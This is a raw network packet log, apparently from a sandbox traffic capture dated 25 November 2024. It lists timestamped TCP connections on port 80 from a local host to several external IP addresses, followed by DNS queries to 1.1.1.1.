                                                                                Nov 25, 2024 12:01:38.248055935 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248111010 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248142004 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.248308897 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248339891 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.248452902 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248598099 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248620033 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.248657942 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248838902 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.248847008 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.248900890 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.249104023 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.249140024 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.249190092 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.249408960 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.249413967 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.249464989 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.249741077 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.449618101 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.449733019 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.449951887 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.449965000 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.449995041 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.450208902 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.450438976 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.450476885 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.450670958 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.450833082 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.451003075 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.451158047 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.451749086 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.451839924 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452050924 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.452428102 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452558994 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452716112 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452855110 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.452883005 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452893972 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452976942 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.452987909 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.453078985 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.453109980 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.453156948 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.453167915 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.453335047 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.453572989 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.453629017 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.453852892 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.453855991 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.453913927 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.454108953 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.454324961 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.454382896 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.454581022 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.454617977 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.454739094 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.454886913 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.455002069 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.455132008 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.455162048 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.455446005 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.455456018 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.455696106 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.455775976 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.455897093 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.456016064 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.456166029 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.456291914 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.456366062 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.456554890 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.456693888 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.456715107 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.456928015 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.457048893 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.457098007 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.457290888 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.457412958 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.457577944 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.457701921 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.457827091 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.457926035 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.458060026 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.458184004 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.458234072 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.458409071 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.458530903 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.458576918 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.458726883 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.458848953 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.458966017 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.459177017 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.459296942 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.459332943 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.459588051 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.459597111 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.459801912 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.459912062 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.459999084 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.460113049 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.460249901 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.460412025 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.460422039 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.460658073 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.460778952 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.460798979 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.461071968 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.461193085 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.461384058 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.461389065 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.461443901 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.461555958 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.461791039 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.461910009 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.462021112 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.462156057 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.462280989 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.462368965 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.462590933 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.462713957 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.462805986 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.462941885 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.463063955 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.463074923 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.463347912 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.463466883 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.463490963 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.463618040 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.463742018 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.463897943 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.464093924 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.464174986 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.464247942 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.464513063 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.464521885 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.464677095 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.464796066 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.464804888 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.464910030 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.465188026 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.465307951 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.465495110 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.465533018 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.465657949 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.465677023 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.465936899 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.466048956 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.466130018 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.466253996 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.466379881 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.466432095 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.466726065 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.466780901 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.466922998 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.467020988 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.467164040 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.467252016 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.467521906 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:38.467838049 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.468444109 CET4980580192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:38.680979013 CET804980531.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:51.632751942 CET4980680192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:51.764872074 CET8049806208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:51.765120983 CET4980680192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:51.768299103 CET4980680192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:51.900434017 CET8049806208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:54.288429976 CET4980780192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:54.420717001 CET8049807208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:54.420953989 CET4980780192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:54.424179077 CET4980780192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:54.556518078 CET8049807208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:56.944104910 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.076231956 CET8049808208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:57.076406956 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.079617977 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.079689980 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.079704046 CET4980880192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:57.211566925 CET8049808208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:59.599951029 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:59.732366085 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:01:59.732650042 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:59.734838963 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:01:59.915872097 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202306032 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202317953 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202414989 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202429056 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:00.202516079 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:02:00.202786922 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:02:00.203541994 CET4980980192.168.11.20208.91.197.27
                                                                                Nov 25, 2024 12:02:00.335745096 CET8049809208.91.197.27192.168.11.20
                                                                                Nov 25, 2024 12:02:05.208026886 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:05.511590004 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.511876106 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:05.515039921 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:05.818367004 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.819756985 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.819766045 CET80498108.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:05.820043087 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:07.019423962 CET4981080192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.035476923 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.354940891 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.355139017 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.358321905 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:08.677699089 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.678581953 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.678633928 CET80498118.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:08.678891897 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:09.862561941 CET4981180192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:10.878640890 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.187298059 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.187525988 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.190808058 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.190857887 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:11.499351978 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499401093 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499437094 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499466896 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499615908 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499651909 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.499752998 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.500478983 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.500518084 CET80498128.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:11.500722885 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:12.705724001 CET4981280192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:13.721785069 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.021703005 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.021962881 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.024198055 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.323895931 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.324695110 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.324779987 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:14.324984074 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.325702906 CET4981380192.168.11.208.210.46.21
                                                                                Nov 25, 2024 12:02:14.625382900 CET80498138.210.46.21192.168.11.20
                                                                                Nov 25, 2024 12:02:19.329929113 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:19.632698059 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.632908106 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:19.636074066 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:19.938723087 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.955864906 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.955874920 CET8049814154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:19.956015110 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:21.141313076 CET4981480192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.157934904 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.457051992 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.457330942 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.460503101 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:22.759712934 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.779562950 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.779608011 CET8049815154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:22.779834986 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:23.968924999 CET4981580192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:24.985317945 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.285501957 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.285871983 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.289370060 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.289396048 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.289448977 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:25.589608908 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.589623928 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.589641094 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.589827061 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.606828928 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.606843948 CET8049816154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:25.607018948 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:26.796416998 CET4981680192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:27.812474966 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.099783897 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.100042105 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.102202892 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.389448881 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.406161070 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.406320095 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:28.406599045 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.407146931 CET4981780192.168.11.20154.88.22.105
                                                                                Nov 25, 2024 12:02:28.694341898 CET8049817154.88.22.105192.168.11.20
                                                                                Nov 25, 2024 12:02:33.420686960 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:33.738605022 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:33.738830090 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:33.742006063 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:34.059695005 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:34.062474966 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:34.062484980 CET804981843.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:34.062658072 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:35.247631073 CET4981880192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.263837099 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.579875946 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.580096960 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.583499908 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:36.899539948 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.902487993 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.902498007 CET804981943.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:36.902633905 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:38.090760946 CET4981980192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.106998920 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.425246000 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.425594091 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.428847075 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.428934097 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:39.747142076 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747189045 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747241974 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747287989 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747349024 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.747383118 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.750567913 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.750613928 CET804982043.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:39.750797987 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:40.933912039 CET4982080192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:41.950207949 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.271400928 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.271672010 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.273834944 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.594692945 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.597754002 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.597767115 CET804982143.155.76.124192.168.11.20
                                                                                Nov 25, 2024 12:02:42.598121881 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.598762989 CET4982180192.168.11.2043.155.76.124
                                                                                Nov 25, 2024 12:02:42.919574022 CET804982143.155.76.124192.168.11.20
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 25, 2024 11:56:55.504550934 CET5966053192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:56:55.619509935 CET53596601.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:57:26.057734966 CET5352953192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:57:26.389983892 CET53535291.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:57:41.827888966 CET5595253192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:57:41.931122065 CET53559521.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:57:55.171067953 CET6192553192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:57:55.282571077 CET53619251.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:58:08.416037083 CET6477153192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:58:08.755079985 CET53647711.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:58:23.350100040 CET5267353192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:58:23.451129913 CET53526731.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:58:31.504426956 CET5801353192.168.11.201.1.1.1
                                                                                Nov 25, 2024 11:58:31.673877954 CET53580131.1.1.1192.168.11.20
                                                                                Nov 25, 2024 11:58:45.423242092 CET5624053192.168.11.201.1.1.1
